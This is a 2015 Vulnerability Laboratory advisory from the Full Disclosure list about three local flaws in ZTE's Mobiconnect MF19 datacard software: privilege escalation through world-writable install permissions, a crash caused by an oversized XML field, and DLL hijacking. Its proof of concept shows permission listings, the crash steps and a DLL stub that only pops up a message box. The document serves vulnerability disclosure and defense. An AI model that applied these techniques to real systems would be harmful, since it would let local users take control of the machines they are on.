Document Title:
===============
ZTE Datacard MF19 0V1.0.0B PCW - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1392


Release Date:
=============
2015-01-06


Vulnerability Laboratory ID (VL-ID):
====================================
1392


Common Vulnerability Scoring System:
====================================
6


Product & Service Introduction:
===============================
http://www.zte.com.cn
http://www.mobilis.dz/entreprises/mobiconnect.php
http://www.3g.dz/fr/cle_mas/index.php?id_document=2


Abstract Advisory Information:
==============================
An independent vulnerability-laboratory researcher discovered multiple 
vulnerabilities in the official ZTE Datacard mobiconnect (mobilis) MF19 
0V1.0.0B04 software.


Vulnerability Disclosure Timeline:
==================================
2015-01-06:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
ZTE Corporation
Product: Datacard  MF19 (Mobilis) - Software V1.0.0B04 (PCW_MOBILISALGV1.0.0B03)


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local privilege escalation vulnerability has been discovered in the official 
ZTE Datacard mobiconnect MF19 0V1.0.0B04 application software.
The local security vulnerability allows an attackers to gain higher access 
privileges by exploitation of a insecure permission misconfiguration.

The application is vulnerable to an elevation of privileges vulnerability which 
can be used by a simple user that can change the executable file 
with a binary of choice. The vulnerability exist due to the improper 
permissions, with the `F` flag (full) for the `Everyone`(Tout le monde:F) 
and `Users` group, for the all binary file. The files are installed in the 
`Ucell Internet` directory which has the default `Everyone` group 
assigned to it with full permissions making every single file inside vulnerable 
to changeby any user on the affected machine. After an attacker 
replaced the binary with a rootkit, he gain access to SYSTEM privileges after 
the reboot.

The security risk of the local privilege escalation vulnerability is estimated 
as high with a cvss (common vulnerability scoring system) 
count of 6.0. Exploitation of the vulnerability requires a local privileged 
systen user account without user for interaction. 
Successful exploitation of the privilege escalation web vulnerability results 
in software- or system compromise.

The second discovered issue is a dll hijacking vulnerability in the 
mms_dll_r.dll and mediaplayerdll.dll. The issue allows local attackers 
with process privileges to inject own code to the affected libraries.

The third discovered vulnerability is a denial of service bug that affects the 
local process. Local attackers are able to manipulate the 
networkCfg.xml to crash the application with a runtime error that results in a 
unhandled exception.



Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by local attackers with restricted account 
privileges and without user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

Insecure Permissions Privilege Escalation, Denial of Service & DLL Hijacking 
Exploit (mms_dll_r.dll, mediaplayerdll.dll)

--- PoC Session Logs Local Privilege Escalation ---
   
C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\Mobiconnect"
C:\Program Files\Mobiconnect
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Tout le monde
        FILE_ALL_ACCESS
  RW NT SERVICE\TrustedInstaller
        FILE_ALL_ACCESS
  RW AUTORITE NT\SystÞme
        FILE_ALL_ACCESS
  RW BUILTIN\Administrateurs
        FILE_ALL_ACCESS
  R  BUILTIN\Utilisateurs
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_EA
        FILE_TRAVERSE
        SYNCHRONIZE
        READ_CONTROL

C:\Users\s-dz\Desktop>

C:\Program Files>icacls "Mobiconnect"
Mobiconnect Tout le monde:(F)
            Tout le monde:(OI)(CI)(IO)(F)
            NT SERVICE\TrustedInstaller:(I)(F)
            NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
            AUTORITE NT\Système:(I)(F)
            AUTORITE NT\Système:(I)(OI)(CI)(IO)(F)
            BUILTIN\Administrateurs:(I)(F)
            BUILTIN\Administrateurs:(I)(OI)(CI)(IO)(F)
            BUILTIN\Utilisateurs:(I)(RX)
            BUILTIN\Utilisateurs:(I)(OI)(CI)(IO)(GR,GE)
            CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F)

1 fichiers correctement traités ; échec du traitement de 0 fichiers


--- PoC Local DoS ---

first go to C:\program files\Internet Mobile\networkCfg.xml (Network 
configuration)
and write "A" * 3000 in     <ConfigFileName>"A" x 3000</ConfigFileName> . Save 
it open the program .
poc will crash ...
                                                       

--- DLL Hijacking Exploit (mms_dll_r.dll, mediaplayerdll.dll) ---

    */

    #include <windows.h> 

    BOOL WINAPI DllMain (
                HANDLE    hinstDLL,
                DWORD     fdwReason,
                LPVOID    lpvReserved)
    {
        switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
    owned();
    case DLL_THREAD_ATTACH:
            case DLL_THREAD_DETACH:
            case DLL_PROCESS_DETACH:
    break;
    }
    return TRUE;
    }

    int owned() {
    MessageBox(0, "ZTE DLL Hijacked\Hadji Samir", "POC", MB_OK);
    }


Security Risk:
==============
The security risk of the local privilege escalation vulnerability, dos issue 
and ddl injection bug in the software are estimated as high. (CVSS 6.0)


Credits & Authors:
==================
Hadji Samir s...@hotmail.fr


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen 
material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
                        - www.evolution-sec.com
Contact:    ad...@vulnerability-lab.com         - 
resea...@vulnerability-lab.com                        - ad...@evolution-sec.com
Section:    magazine.vulnerability-db.com       - 
vulnerability-lab.com/contact.php                     - 
evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
                        - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All 
other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To 
record, list (feed), modify, use or edit our material contact 
(ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a 
permission.

                                Copyright © 2014 | Vulnerability Laboratory - 
[Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: resea...@vulnerability-lab.com
PGP KEY: 
http://www.vulnerability-lab.com/keys/ad...@vulnerability-lab.com%280x198E9928%29.txt



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Reply via email to